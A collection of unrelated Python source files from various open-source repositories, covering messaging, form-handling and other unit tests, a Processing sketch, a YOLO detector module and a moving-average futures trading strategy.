class TestMonitorFailure(test_utils.BaseTestCase):
"""Test what happens when the call monitor watchdog hits an exception when
sending the heartbeat.
"""
class _SleepyEndpoint(object):
def __init__(self, target=None):
self.target = target
def sleep(self, ctxt, **kwargs):
time.sleep(kwargs['timeout'])
return True
def test_heartbeat_failure(self):
endpoints = [self._SleepyEndpoint()]
dispatcher = oslo_messaging.RPCDispatcher(endpoints,
serializer=None)
# sleep long enough for the client_timeout to expire multiple times
# the timeout is (client_timeout/2) and must be > 1.0
message = {'method': 'sleep',
'args': {'timeout': 3.5}}
ctxt = {'test': 'value'}
incoming = mock.Mock(ctxt=ctxt, message=message, client_timeout=2.0)
incoming.heartbeat = mock.Mock(side_effect=Exception('BOOM!'))
res = dispatcher.dispatch(incoming)
self.assertTrue(res)
# only one call to heartbeat should be made since the watchdog thread
# should exit on the first exception thrown
self.assertEqual(1, incoming.heartbeat.call_count)
|
tabnine-vim/third_party/ycmd/third_party/frozendict/setup.py | MrMonk3y/vimrc | 239 | 12770629 | from distutils.core import setup
setup(
name = 'frozendict',
version = '0.3',
url = 'https://github.com/slezica/python-frozendict',
author = '<NAME>',
author_email = '<EMAIL>',
packages = ['frozendict'],
license = 'MIT License',
description = 'An immutable dictionary',
long_description = open('README.txt').read()
)
|
mode/examples/Basics/Structure/Loop/Loop.pyde | timgates42/processing.py | 1,224 | 12770637 | <reponame>timgates42/processing.py
"""
Loop.
The loop() function causes draw() to execute
repeatedly. If noLoop is called in setup()
the draw() is only executed once. In this example
click the mouse to execute loop(), which will
cause the draw() to execute repeatedly.
"""
y = 100
def setup():
"""
The statements in the setup() function
run once when the program begins.
"""
size(640, 360) # Size should be the first statement
stroke(255) # Set stroke color to white
noLoop()
y = height * 0.5
def draw():
"""
The statements in draw() are run until the
program is stopped. Each statement is run in
sequence and after the last line is read, the first
line is run again.
"""
global y
background(0) # Set the background to black
line(0, y, width, y)
y = y - 1
if y < 0:
y = height
def mousePressed():
loop()
|
model_zoo/YoloFastest/model/detector.py | danieltao1993/YoloAll | 190 | 12770639 | <reponame>danieltao1993/YoloAll
import torch
import torch.nn as nn
from model.fpn import *
from model.backbone.shufflenetv2 import *
class Detector(nn.Module):
def __init__(self, classes, anchor_num, load_param):
super(Detector, self).__init__()
out_depth = 112
stage_out_channels = [-1, 24, 48, 96, 192]
self.backbone = ShuffleNetV2(stage_out_channels, load_param)
self.fpn = LightFPN(stage_out_channels[-2] + stage_out_channels[-1], stage_out_channels[-1], out_depth)
self.output_layers = nn.Conv2d(out_depth, (5 + classes) * 3, 1, 1, 0, bias=True)
def forward(self, x):
C2, C3 = self.backbone(x)
P2, P3 = self.fpn(C2, C3)
out_2 = self.output_layers(P2)
out_3 = self.output_layers(P3)
return out_2, out_3
if __name__ == "__main__":
model = Detector(80, 3)
test_data = torch.rand(1, 3, 320, 320)
torch.onnx.export(model, #model being run
test_data, # model input (or a tuple for multiple inputs)
"test.onnx", # where to save the model (can be a file or file-like object)
export_params=True, # store the trained parameter weights inside the model file
opset_version=11, # the ONNX version to export the model to
do_constant_folding=True) # whether to execute constant folding for optimization
|
tests/unit/test_readHelper.py | woshiange/python-lambda | 1,441 | 12770670 | <filename>tests/unit/test_readHelper.py
import os
import unittest
import yaml
from aws_lambda.helpers import read
class TestReadHelper(unittest.TestCase):
TEST_FILE = "readTmp.txt"
def setUp(self):
with open(TestReadHelper.TEST_FILE, "w") as tmp_file:
tmp_file.write("testYaml: testing")
def tearDown(self):
os.remove(TestReadHelper.TEST_FILE)
def test_read_no_loader_non_binary(self):
fileContents = read(TestReadHelper.TEST_FILE)
self.assertEqual(fileContents, "testYaml: testing")
def test_read_yaml_loader_non_binary(self):
testYaml = read(TestReadHelper.TEST_FILE, loader=yaml.full_load)
self.assertEqual(testYaml["testYaml"], "testing")
def test_read_no_loader_binary_mode(self):
fileContents = read(TestReadHelper.TEST_FILE, binary_file=True)
self.assertEqual(fileContents, b"testYaml: testing")
def test_read_yaml_loader_binary_mode(self):
testYaml = read(
TestReadHelper.TEST_FILE, loader=yaml.full_load, binary_file=True
)
self.assertEqual(testYaml["testYaml"], "testing")
|
tests/http_provider_hosted_test.py | ilblackdragon/studio | 397 | 12770690 | import unittest
import os
import tempfile
import uuid
from studio import model
from model_test import get_test_experiment
# We are not currently working with HTTP providers.
@unittest.skip
class HTTPProviderHostedTest(unittest.TestCase):
def get_db_provider(self, config_name):
config_file = os.path.join(
os.path.dirname(
os.path.realpath(__file__)),
config_name)
return model.get_db_provider(model.get_config(config_file))
def test_add_get_delete_experiment(self):
with self.get_db_provider('test_config_http_client.yaml') as hp:
experiment_tuple = get_test_experiment()
hp.add_experiment(experiment_tuple[0])
experiment = hp.get_experiment(experiment_tuple[0].key)
self.assertEquals(experiment.key, experiment_tuple[0].key)
self.assertEquals(
experiment.filename,
experiment_tuple[0].filename)
self.assertEquals(experiment.args, experiment_tuple[0].args)
hp.delete_experiment(experiment_tuple[1])
self.assertTrue(hp.get_experiment(experiment_tuple[1]) is None)
def test_start_experiment(self):
with self.get_db_provider('test_config_http_client.yaml') as hp:
experiment_tuple = get_test_experiment()
hp.add_experiment(experiment_tuple[0])
hp.start_experiment(experiment_tuple[0])
experiment = hp.get_experiment(experiment_tuple[1])
self.assertTrue(experiment.status == 'running')
self.assertEquals(experiment.key, experiment_tuple[0].key)
self.assertEquals(
experiment.filename,
experiment_tuple[0].filename)
self.assertEquals(experiment.args, experiment_tuple[0].args)
hp.finish_experiment(experiment_tuple[0])
hp.delete_experiment(experiment_tuple[1])
def test_add_get_experiment_artifacts(self):
experiment_tuple = get_test_experiment()
e_experiment = experiment_tuple[0]
e_artifacts = e_experiment.artifacts
a1_filename = os.path.join(tempfile.gettempdir(), str(uuid.uuid4()))
a2_filename = os.path.join(tempfile.gettempdir(), str(uuid.uuid4()))
with open(a1_filename, 'w') as f:
f.write('hello world')
e_artifacts['a1'] = {
'local': a1_filename,
'mutable': False
}
e_artifacts['a2'] = {
'local': a2_filename,
'mutable': True
}
with self.get_db_provider('test_config_http_client.yaml') as db:
db.add_experiment(e_experiment)
experiment = db.get_experiment(e_experiment.key)
self.assertEquals(experiment.key, e_experiment.key)
self.assertEquals(experiment.filename, e_experiment.filename)
self.assertEquals(experiment.args, e_experiment.args)
db.delete_experiment(e_experiment.key)
os.remove(a1_filename)
if __name__ == '__main__':
unittest.main()
|
chamfer_pytorch/test_chamfer.py | jiyeonkim127/PSI | 138 | 12770717 | <filename>chamfer_pytorch/test_chamfer.py
import torch
import dist_chamfer as ext
distChamfer = ext.chamferDist()
from torch.autograd import Variable
def pairwise_dist(x, y):
xx, yy, zz = torch.mm(x, x.t()), torch.mm(y, y.t()), torch.mm(x, y.t())
rx = xx.diag().unsqueeze(0).expand_as(xx)
ry = yy.diag().unsqueeze(0).expand_as(yy)
P = rx.t() + ry - 2 * zz
return P
def NN_loss(x, y, dim=0):
dist = pairwise_dist(x, y)
values, indices = dist.min(dim=dim)
return values.mean()
def mydistChamfer(a, b):
x, y = a, b
bs, num_points, points_dim = x.size()
xx = torch.bmm(x, x.transpose(2, 1))
yy = torch.bmm(y, y.transpose(2, 1))
zz = torch.bmm(x, y.transpose(2, 1))
diag_ind = torch.arange(0, num_points).type(torch.cuda.LongTensor)
rx = xx[:, diag_ind, diag_ind].unsqueeze(1).expand_as(xx)
ry = yy[:, diag_ind, diag_ind].unsqueeze(1).expand_as(yy)
P = rx.transpose(2, 1) + ry - 2 * zz
return torch.min(P, 2)[0], torch.min(P, 1)[0]
def test_chamfer():
distChamfer = ext.chamferDist()
p1 = torch.rand(4, 100, 3).cuda()
p2 = torch.rand(4, 100, 3).cuda()
points1 = Variable(p1, requires_grad=True)
points2 = Variable(p2)
dist1, dist2, = distChamfer(points1, points2)
loss = torch.sum(dist1)
print(loss)
loss.backward()
print(points1.grad, points2.grad)
mydist1, mydist2 = mydistChamfer(points1, points2)
d1 = (dist1 - mydist1) ** 2
d2 = (dist2 - mydist2) ** 2
print(d1, d2)
assert (
torch.sum(d1) + torch.sum(d2) < 0.00000001
), "chamfer cuda and chamfer normal are not giving the same results"
test_chamfer()
|
examples/strategies/double_ma.py | mcFore/ctpbee | 461 | 12770727 | <filename>examples/strategies/double_ma.py
from ctpbee import CtpbeeApi, CtpBee
from ctpbee.constant import Offset, TradeData, Direction
from ctpbee.indicator.ta_lib import ArrayManager
class DoubleMaStrategy(CtpbeeApi):
def __init__(self, name):
super().__init__(name)
self.manager = ArrayManager(100)
self.instrument_set = ["rb2101.SHFE"] # 这个里面的变量 如果你开启了行情分离选项, 当数据进来的时候会判断数据 只会把相应的行情送进来, 还要就是可以通过来订阅指定行情
self.buy = 0
self.sell = 0
self.slow = 60
self.fast = 30
def on_trade(self, trade: TradeData):
if trade.offset == Offset.OPEN:
if trade.direction == Direction.LONG:
self.buy += trade.volume
else:
self.sell += trade.volume
else:
if trade.direction == Direction.LONG:
self.sell -= trade.volume
else:
self.buy -= trade.volume
def on_bar(self, bar):
""" """
self.manager.add_data(bar)
if not self.manager.inited:
return
fast_avg = self.manager.sma(self.fast, array=True)
slow_avg = self.manager.sma(self.slow, array=True)
if slow_avg[-2] < fast_avg[-2] and slow_avg[-1] >= fast_avg[-1]:
self.action.cover(bar.close_price, self.buy, bar)
self.action.sell(bar.close_price, 3, bar)
if fast_avg[-2] < slow_avg[-2] and fast_avg[-1] >= slow_avg[-1]:
self.action.sell(bar.close_price, self.sell, bar)
self.action.buy(bar.close_price, 3, bar)
def on_tick(self, tick):
pass
def on_init(self, init: bool):
print("初始化成功了, 这里可能会触发两次哦")
if __name__ == '__main__':
app = CtpBee("doublema", __name__, refresh=True)
app.config.from_mapping({
"CONNECT_INFO": {
"userid": "089131",
"password": "<PASSWORD>",
"brokerid": "9999",
"md_address": "tcp://172.16.17.32:10112",
"td_address": "tcp://172.16.17.32:10102",
"product_info": "",
"appid": "simnow_client_test",
"auth_code": "0000000000000000"
},
"INTERFACE": "ctp", # 接口声明
"TD_FUNC": True, # 开启交易功能
"MD_FUNC": True,
"XMIN": [1]
})
strategy = DoubleMaStrategy("doublema")
app.add_extension(strategy)
app.start()
|
tests/test_forms.py | azmeuk/webtest | 239 | 12770747 | <gh_stars>100-1000
import cgi
import os.path
import struct
import sys
import webtest
from webob import Request
from webtest.debugapp import DebugApp
from webtest.compat import to_bytes
from webtest.forms import NoValue, Submit, Upload
from tests.compat import unittest
from tests.compat import u
class TestForms(unittest.TestCase):
def callFUT(self, filename='form_inputs.html', formid='simple_form'):
dirname = os.path.join(os.path.dirname(__file__), 'html')
app = DebugApp(form=os.path.join(dirname, filename), show_form=True)
resp = webtest.TestApp(app).get('/form.html')
return resp.forms[formid]
def test_set_submit_field(self):
form = self.callFUT()
self.assertRaises(
AttributeError,
form['submit'].value__set,
'foo'
)
def test_button(self):
form = self.callFUT()
button = form['button']
self.assertTrue(isinstance(button, Submit),
"<button> without type is a submit button")
def test_button_value_if_submitted(self):
form = self.callFUT()
submit = form['submit']
self.assertEqual(
submit.value_if_submitted(), '',
"submit default value is ''")
button = form['button']
self.assertEqual(
button.value_if_submitted(), '',
"submit default value is ''")
def test_force_select(self):
form = self.callFUT()
form['select'].force_value('notavalue')
form['select'].value__set('value3')
self.assertTrue(
form['select']._forced_value is NoValue,
"Setting a value after having forced a value should keep a forced"
" state")
self.assertEqual(
form['select'].value, 'value3',
"the value should the the one set by value__set")
self.assertEqual(
form['select'].selectedIndex, 2,
"the value index should be the one set by value__set")
def test_form_select(self):
form = self.callFUT()
form.select('select', 'value1')
self.assertEqual(
form['select'].value, 'value1',
"when using form.select, the input selected value should be "
"changed")
def test_get_field_by_index(self):
form = self.callFUT()
self.assertEqual(form['select'],
form.get('select', index=0))
def test_get_unknown_field(self):
form = self.callFUT()
self.assertEqual(form['unknown'].value, '')
form['unknown'].value = '1'
self.assertEqual(form['unknown'].value, '1')
def test_get_non_exist_fields(self):
form = self.callFUT()
self.assertRaises(AssertionError, form.get, 'nonfield')
def test_get_non_exist_fields_with_default(self):
form = self.callFUT()
value = form.get('nonfield', default=1)
self.assertEqual(value, 1)
def test_upload_fields(self):
form = self.callFUT()
fu = webtest.Upload(__file__)
form['file'] = fu
self.assertEqual(form.upload_fields(),
[['file', __file__]])
def test_repr(self):
form = self.callFUT()
self.assertTrue(repr(form).startswith('<Form id='))
def test_the_bs_node_must_not_change(self):
form = self.callFUT()
self.assertEqual(form.text, str(form.html))
def test_set_multiple_checkboxes(self):
form = self.callFUT(formid='multiple_checkbox_form')
form['checkbox'] = [10, 30]
self.assertEqual(form.get('checkbox', index=0).value, '10')
self.assertEqual(form.get('checkbox', index=1).value, None)
self.assertEqual(form.get('checkbox', index=2).value, '30')
def test_button_submit(self):
form = self.callFUT(formid='multiple_buttons_form')
display = form.submit('action')
self.assertIn(u("action=deactivate"), display, display)
def test_button_submit_by_index(self):
form = self.callFUT(formid='multiple_buttons_form')
display = form.submit('action', index=1)
self.assertIn(u("action=activate"), display, display)
def test_button_submit_by_value(self):
form = self.callFUT(formid='multiple_buttons_form')
display = form.submit('action', value='activate')
self.assertIn(u("action=activate"), display, display)
def test_button_submit_by_value_and_index(self):
form = self.callFUT(formid='multiple_buttons_form')
self.assertRaises(ValueError,
form.submit, "action", value="activate",
index=0)
class TestResponseFormAttribute(unittest.TestCase):
def callFUT(self, body):
app = DebugApp(form=to_bytes(body))
return webtest.TestApp(app)
def test_no_form(self):
app = self.callFUT('<html><body></body></html>')
res = app.get('/form.html')
self.assertRaises(TypeError, lambda: res.form)
def test_too_many_forms(self):
app = self.callFUT(
'<html><body><form></form><form></form></body></html>')
res = app.get('/form.html')
self.assertRaises(TypeError, lambda: res.form)
class TestInput(unittest.TestCase):
def callFUT(self, filename='form_inputs.html'):
dirname = os.path.join(os.path.dirname(__file__), 'html')
app = DebugApp(form=os.path.join(dirname, filename), show_form=True)
return webtest.TestApp(app)
def test_input(self):
app = self.callFUT()
res = app.get('/form.html')
self.assertEqual(res.status_int, 200)
self.assertTrue(res.content_type.startswith('text/html'))
form = res.forms['text_input_form']
self.assertEqual(form['foo'].value, 'bar')
self.assertEqual(form.submit_fields(), [('foo', 'bar')])
form = res.forms['radio_input_form']
self.assertEqual(form['foo'].selectedIndex, 1)
self.assertEqual(form['foo'].value, 'baz')
self.assertEqual(form.submit_fields(), [('foo', 'baz')])
form = res.forms['checkbox_input_form']
self.assertEqual(form['foo'].value, 'bar')
self.assertEqual(form.submit_fields(), [('foo', 'bar')])
form = res.forms['password_input_form']
self.assertEqual(form['foo'].value, 'bar')
self.assertEqual(form.submit_fields(), [('foo', 'bar')])
def test_force_radio_input(self):
app = self.callFUT()
res = app.get('/form.html')
form = res.forms['radio_input_form']
form['foo'].force_value('fido')
self.assertEqual(form['foo'].value, 'fido')
self.assertEqual(form.submit_fields(), [('foo', 'fido')])
def test_radio_input_order(self):
app = self.callFUT()
res = app.get('/form.html')
self.assertEqual(res.status_int, 200)
self.assertTrue(res.content_type.startswith('text/html'))
form = res.forms['complex_radio_input_form']
form['foo'].value = 'true'
self.assertEqual(form['foo'].value, 'true')
self.assertEqual(form['foo'].selectedIndex, 0)
self.assertEqual(form.submit_fields(), [
('__start__', 'item:mapping'),
('foo', 'true'),
('__end__', 'item:mapping'),
('__start__', 'item:mapping'),
('__end__', 'item:mapping')])
res = app.get('/form.html')
form = res.forms['complex_radio_input_form']
self.assertEqual(form['foo'].value, 'true')
self.assertEqual(form['foo'].selectedIndex, 1)
self.assertEqual(form.submit_fields(), [
('__start__', 'item:mapping'),
('__end__', 'item:mapping'),
('__start__', 'item:mapping'),
('foo', 'true'),
('__end__', 'item:mapping')])
def test_input_unicode(self):
app = self.callFUT('form_unicode_inputs.html')
res = app.get('/form.html')
self.assertEqual(res.status_int, 200)
self.assertTrue(res.content_type.startswith('text/html'))
self.assertEqual(res.charset.lower(), 'utf-8')
form = res.forms['text_input_form']
self.assertEqual(form['foo'].value, u('Хармс'))
self.assertEqual(form.submit_fields(), [('foo', u('Хармс'))])
form = res.forms['radio_input_form']
self.assertEqual(form['foo'].selectedIndex, 1)
self.assertEqual(form['foo'].value, u('Блок'))
self.assertEqual(form.submit_fields(), [('foo', u('Блок'))])
form = res.forms['checkbox_input_form']
self.assertEqual(form['foo'].value, u('Хармс'))
self.assertEqual(form.submit_fields(), [('foo', u('Хармс'))])
form = res.forms['password_input_form']
self.assertEqual(form['foo'].value, u('Хармс'))
self.assertEqual(form.submit_fields(), [('foo', u('Хармс'))])
def test_input_no_default(self):
app = self.callFUT('form_inputs_with_defaults.html')
res = app.get('/form.html')
self.assertEqual(res.status_int, 200)
self.assertTrue(res.content_type.startswith('text/html'))
form = res.forms['text_input_form']
self.assertEqual(form['foo'].value, '')
self.assertEqual(form.submit_fields(), [('foo', '')])
form = res.forms['radio_input_form']
self.assertTrue(form['foo'].value is None)
self.assertEqual(form.submit_fields(), [])
form = res.forms['checkbox_input_form']
self.assertTrue(form['foo'].value is None)
self.assertEqual(form.submit_fields(), [])
form = res.forms['password_input_form']
self.assertEqual(form['foo'].value, '')
self.assertEqual(form.submit_fields(), [('foo', '')])
def test_textarea_entities(self):
app = self.callFUT()
res = app.get('/form.html')
form = res.forms.get("textarea_input_form")
self.assertEqual(form.get("textarea").value, "'foo&bar'")
self.assertEqual(form.submit_fields(), [('textarea', "'foo&bar'")])
def test_textarea_emptyfirstline(self):
app = self.callFUT()
res = app.get('/form.html')
form = res.forms.get("textarea_emptyline_form")
self.assertEqual(form.get("textarea").value, "aaa")
self.assertEqual(form.submit_fields(), [('textarea', "aaa")])
class TestFormLint(unittest.TestCase):
def test_form_lint(self):
form = webtest.Form(None, '''<form>
<input type="text" name="field"/>
</form>''')
self.assertRaises(AttributeError, form.lint)
form = webtest.Form(None, '''<form>
<input type="text" id="myfield" name="field"/>
</form>''')
self.assertRaises(AttributeError, form.lint)
form = webtest.Form(None, '''<form>
<label for="myfield">my field</label>
<input type="text" id="myfield" name="field"/>
</form>''')
form.lint()
form = webtest.Form(None, '''<form>
<label class="field" for="myfield" role="r">my field</label>
<input type="text" id="myfield" name="field"/>
</form>''')
form.lint()
def select_app(environ, start_response):
req = Request(environ)
status = b"200 OK"
if req.method == "GET":
body = to_bytes("""
<html>
<head><title>form page</title></head>
<body>
<form method="POST" id="single_select_form">
<select id="single" name="single">
<option value="4">Four</option>
<option value="5" selected="selected">Five</option>
<option value="6">Six</option>
<option value="7">Seven</option>
</select>
<input name="button" type="submit" value="single">
</form>
<form method="POST" id="multiple_select_form">
<select id="multiple" name="multiple" multiple>
<option value="8" selected="selected">Eight</option>
<option value="9">Nine</option>
<option value="10">Ten</option>
<option value="11" selected="selected">Eleven</option>
</select>
<input name="button" type="submit" value="multiple">
</form>
</body>
</html>
""")
else:
select_type = req.POST.get("button")
if select_type == "single":
selection = req.POST.get("single")
elif select_type == "multiple":
selection = ", ".join(req.POST.getall("multiple"))
body = to_bytes("""
<html>
<head><title>display page</title></head>
<body>
<p>You submitted the %(select_type)s </p>
<p>You selected %(selection)s</p>
</body>
</html>
""" % dict(selection=selection, select_type=select_type))
headers = [
('Content-Type', 'text/html; charset=utf-8'),
('Content-Length', str(len(body)))]
# PEP 3333 requires native strings:
headers = [(str(k), str(v)) for k, v in headers]
start_response(status, headers)
return [body]
def select_app_without_values(environ, start_response):
req = Request(environ)
status = b"200 OK"
if req.method == "GET":
body = to_bytes("""
<html>
<head><title>form page</title></head>
<body>
<form method="POST" id="single_select_form">
<select id="single" name="single">
<option>Four</option>
<option>Five</option>
<option>Six</option>
<option>Seven</option>
</select>
<input name="button" type="submit" value="single">
</form>
<form method="POST" id="multiple_select_form">
<select id="multiple" name="multiple" multiple="multiple">
<option>Eight</option>
<option selected value="Nine">Nine</option>
<option>Ten</option>
<option selected>Eleven</option>
</select>
<input name="button" type="submit" value="multiple">
</form>
</body>
</html>
""")
else:
select_type = req.POST.get("button")
if select_type == "single":
selection = req.POST.get("single")
elif select_type == "multiple":
selection = ", ".join(req.POST.getall("multiple"))
body = to_bytes("""
<html>
<head><title>display page</title></head>
<body>
<p>You submitted the %(select_type)s </p>
<p>You selected %(selection)s</p>
</body>
</html>
""" % dict(selection=selection, select_type=select_type))
headers = [
('Content-Type', 'text/html; charset=utf-8'),
('Content-Length', str(len(body)))]
# PEP 3333 requires native strings:
headers = [(str(k), str(v)) for k, v in headers]
start_response(status, headers)
return [body]
def select_app_without_default(environ, start_response):
req = Request(environ)
status = b"200 OK"
if req.method == "GET":
body = to_bytes("""
<html>
<head><title>form page</title></head>
<body>
<form method="POST" id="single_select_form">
<select id="single" name="single">
<option value="4">Four</option>
<option value="5">Five</option>
<option value="6">Six</option>
<option value="7">Seven</option>
</select>
<input name="button" type="submit" value="single">
</form>
<form method="POST" id="multiple_select_form">
<select id="multiple" name="multiple" multiple="multiple">
<option value="8">Eight</option>
<option value="9">Nine</option>
<option value="10">Ten</option>
<option value="11">Eleven</option>
</select>
<input name="button" type="submit" value="multiple">
</form>
</body>
</html>
""")
else:
select_type = req.POST.get("button")
if select_type == "single":
selection = req.POST.get("single")
elif select_type == "multiple":
selection = ", ".join(req.POST.getall("multiple"))
body = to_bytes("""
<html>
<head><title>display page</title></head>
<body>
<p>You submitted the %(select_type)s </p>
<p>You selected %(selection)s</p>
</body>
</html>
""" % dict(selection=selection, select_type=select_type))
headers = [
('Content-Type', 'text/html; charset=utf-8'),
('Content-Length', str(len(body)))]
# PEP 3333 requires native strings:
headers = [(str(k), str(v)) for k, v in headers]
start_response(status, headers)
return [body]
def select_app_unicode(environ, start_response):
req = Request(environ)
status = b"200 OK"
if req.method == "GET":
body = u("""
<html>
<head><title>form page</title></head>
<body>
<form method="POST" id="single_select_form">
<select id="single" name="single">
<option value="ЕКБ">Екатеринбург</option>
<option value="МСК" selected="selected">Москва</option>
<option value="СПБ">Санкт-Петербург</option>
<option value="САМ">Самара</option>
</select>
<input name="button" type="submit" value="single">
</form>
<form method="POST" id="multiple_select_form">
<select id="multiple" name="multiple" multiple="multiple">
<option value="8" selected="selected">Лондон</option>
<option value="9">Париж</option>
<option value="10">Пекин</option>
<option value="11" selected="selected">Бристоль</option>
</select>
<input name="button" type="submit" value="multiple">
</form>
</body>
</html>
""").encode('utf8')
else:
select_type = req.POST.get("button")
if select_type == "single":
selection = req.POST.get("single")
elif select_type == "multiple":
selection = ", ".join(req.POST.getall("multiple"))
body = (u("""
<html>
<head><title>display page</title></head>
<body>
<p>You submitted the %(select_type)s </p>
<p>You selected %(selection)s</p>
</body>
</html>
""") % dict(selection=selection, select_type=select_type)).encode('utf8')
headers = [
('Content-Type', 'text/html; charset=utf-8'),
('Content-Length', str(len(body)))]
# PEP 3333 requires native strings:
headers = [(str(k), str(v)) for k, v in headers]
start_response(status, headers)
if not isinstance(body, bytes):
raise AssertionError('Body is not %s' % bytes)
return [body]
class TestSelect(unittest.TestCase):
def test_unicode_select(self):
app = webtest.TestApp(select_app_unicode)
res = app.get('/')
single_form = res.forms["single_select_form"]
self.assertEqual(single_form["single"].value, u("МСК"))
display = single_form.submit("button")
self.assertIn(u("<p>You selected МСК</p>"), display, display)
res = app.get('/')
single_form = res.forms["single_select_form"]
self.assertEqual(single_form["single"].value, u("МСК"))
single_form.set("single", u("СПБ"))
self.assertEqual(single_form["single"].value, u("СПБ"))
display = single_form.submit("button")
self.assertIn(u("<p>You selected СПБ</p>"), display, display)
def test_single_select(self):
app = webtest.TestApp(select_app)
res = app.get('/')
self.assertEqual(res.status_int, 200)
self.assertEqual(res.headers['content-type'],
'text/html; charset=utf-8')
self.assertEqual(res.content_type, 'text/html')
single_form = res.forms["single_select_form"]
self.assertEqual(single_form["single"].value, "5")
display = single_form.submit("button")
self.assertIn("<p>You selected 5</p>", display, display)
res = app.get('/')
self.assertEqual(res.status_int, 200)
self.assertEqual(res.headers['content-type'],
'text/html; charset=utf-8')
self.assertEqual(res.content_type, 'text/html')
single_form = res.forms["single_select_form"]
self.assertEqual(single_form["single"].value, "5")
single_form.set("single", "6")
self.assertEqual(single_form["single"].value, "6")
display = single_form.submit("button")
self.assertIn("<p>You selected 6</p>", display, display)
res = app.get('/')
single_form = res.forms["single_select_form"]
self.assertRaises(ValueError, single_form.select, "single", "5",
text="Five")
self.assertRaises(ValueError, single_form.select, "single",
text="Three")
single_form.select("single", text="Seven")
self.assertEqual(single_form["single"].value, "7")
display = single_form.submit("button")
self.assertIn("<p>You selected 7</p>", display, display)
def test_single_select_forced_value(self):
app = webtest.TestApp(select_app)
res = app.get('/')
self.assertEqual(res.status_int, 200)
self.assertEqual(res.headers['content-type'],
'text/html; charset=utf-8')
self.assertEqual(res.content_type, 'text/html')
single_form = res.forms["single_select_form"]
self.assertEqual(single_form["single"].value, "5")
self.assertRaises(ValueError, single_form.set, "single", "984")
single_form["single"].force_value("984")
self.assertEqual(single_form["single"].value, "984")
display = single_form.submit("button")
self.assertIn("<p>You selected 984</p>", display, display)
def test_single_select_no_default(self):
app = webtest.TestApp(select_app_without_default)
res = app.get('/')
self.assertEqual(res.status_int, 200)
self.assertEqual(res.headers['content-type'],
'text/html; charset=utf-8')
self.assertEqual(res.content_type, 'text/html')
single_form = res.forms["single_select_form"]
self.assertEqual(single_form["single"].value, "4")
display = single_form.submit("button")
self.assertIn("<p>You selected 4</p>", display, display)
res = app.get('/')
self.assertEqual(res.status_int, 200)
self.assertEqual(res.headers['content-type'],
'text/html; charset=utf-8')
self.assertEqual(res.content_type, 'text/html')
single_form = res.forms["single_select_form"]
self.assertEqual(single_form["single"].value, "4")
single_form.set("single", 6)
self.assertEqual(single_form["single"].value, "6")
display = single_form.submit("button")
self.assertIn("<p>You selected 6</p>", display, display)
def test_multiple_select(self):
app = webtest.TestApp(select_app)
res = app.get('/')
self.assertEqual(res.status_int, 200)
self.assertEqual(res.headers['content-type'],
'text/html; charset=utf-8')
self.assertEqual(res.content_type, 'text/html')
multiple_form = res.forms["multiple_select_form"]
self.assertEqual(multiple_form["multiple"].value, ['8', '11'],
multiple_form["multiple"].value)
display = multiple_form.submit("button")
self.assertIn("<p>You selected 8, 11</p>", display, display)
res = app.get('/')
self.assertEqual(res.status_int, 200)
self.assertEqual(res.headers['content-type'],
'text/html; charset=utf-8')
self.assertEqual(res.content_type, 'text/html')
multiple_form = res.forms["multiple_select_form"]
self.assertEqual(multiple_form["multiple"].value, ["8", "11"],
multiple_form["multiple"].value)
multiple_form.set("multiple", ["9"])
self.assertEqual(multiple_form["multiple"].value, ["9"],
multiple_form["multiple"].value)
display = multiple_form.submit("button")
self.assertIn("<p>You selected 9</p>", display, display)
res = app.get('/')
multiple_form = res.forms["multiple_select_form"]
self.assertRaises(ValueError, multiple_form.select_multiple,
"multiple",
["8", "10"], texts=["Eight", "Ten"])
self.assertRaises(ValueError, multiple_form.select_multiple,
"multiple", texts=["Twelve"])
multiple_form.select_multiple("multiple",
texts=["Eight", "Nine", "Ten"])
display = multiple_form.submit("button")
self.assertIn("<p>You selected 8, 9, 10</p>", display, display)
def test_multiple_select_forced_values(self):
app = webtest.TestApp(select_app)
res = app.get('/')
self.assertEqual(res.status_int, 200)
self.assertEqual(res.headers['content-type'],
'text/html; charset=utf-8')
self.assertEqual(res.content_type, 'text/html')
multiple_form = res.forms["multiple_select_form"]
self.assertEqual(multiple_form["multiple"].value, ["8", "11"],
multiple_form["multiple"].value)
self.assertRaises(ValueError, multiple_form.set,
"multiple", ["24", "88"])
multiple_form["multiple"].force_value(["24", "88"])
self.assertEqual(multiple_form["multiple"].value, ["24", "88"],
multiple_form["multiple"].value)
display = multiple_form.submit("button")
self.assertIn("<p>You selected 24, 88</p>", display, display)
def test_multiple_select_no_default(self):
app = webtest.TestApp(select_app_without_default)
res = app.get('/')
self.assertEqual(res.status_int, 200)
self.assertEqual(res.headers['content-type'],
'text/html; charset=utf-8')
self.assertEqual(res.content_type, 'text/html')
multiple_form = res.forms["multiple_select_form"]
self.assertTrue(multiple_form["multiple"].value is None,
repr(multiple_form["multiple"].value))
display = multiple_form.submit("button")
self.assertIn("<p>You selected </p>", display, display)
res = app.get('/')
self.assertEqual(res.status_int, 200)
self.assertEqual(res.headers['content-type'],
'text/html; charset=utf-8')
self.assertEqual(res.content_type, 'text/html')
multiple_form = res.forms["multiple_select_form"]
self.assertTrue(multiple_form["multiple"].value is None,
multiple_form["multiple"].value)
multiple_form.set("multiple", ["9"])
self.assertEqual(multiple_form["multiple"].value, ["9"],
multiple_form["multiple"].value)
display = multiple_form.submit("button")
self.assertIn("<p>You selected 9</p>", display, display)
def test_select_no_value(self):
app = webtest.TestApp(select_app_without_values)
res = app.get('/')
self.assertEqual(res.status_int, 200)
self.assertEqual(res.headers['content-type'],
'text/html; charset=utf-8')
self.assertEqual(res.content_type, 'text/html')
single_form = res.forms["single_select_form"]
self.assertEqual(single_form["single"].value, "Four")
display = single_form.submit("button")
self.assertIn("<p>You selected Four</p>", display, display)
res = app.get('/')
self.assertEqual(res.status_int, 200)
self.assertEqual(res.headers['content-type'],
'text/html; charset=utf-8')
self.assertEqual(res.content_type, 'text/html')
single_form = res.forms["single_select_form"]
self.assertEqual(single_form["single"].value, "Four")
single_form.set("single", "Six")
self.assertEqual(single_form["single"].value, "Six")
display = single_form.submit("button")
self.assertIn("<p>You selected Six</p>", display, display)
def test_multiple_select_no_value(self):
app = webtest.TestApp(select_app_without_values)
res = app.get('/')
self.assertEqual(res.status_int, 200)
self.assertEqual(res.headers['content-type'],
'text/html; charset=utf-8')
self.assertEqual(res.content_type, 'text/html')
multiple_form = res.forms["multiple_select_form"]
self.assertEqual(multiple_form["multiple"].value, ["Nine", "Eleven"])
display = multiple_form.submit("button")
self.assertIn("<p>You selected Nine, Eleven</p>", display, display)
res = app.get('/')
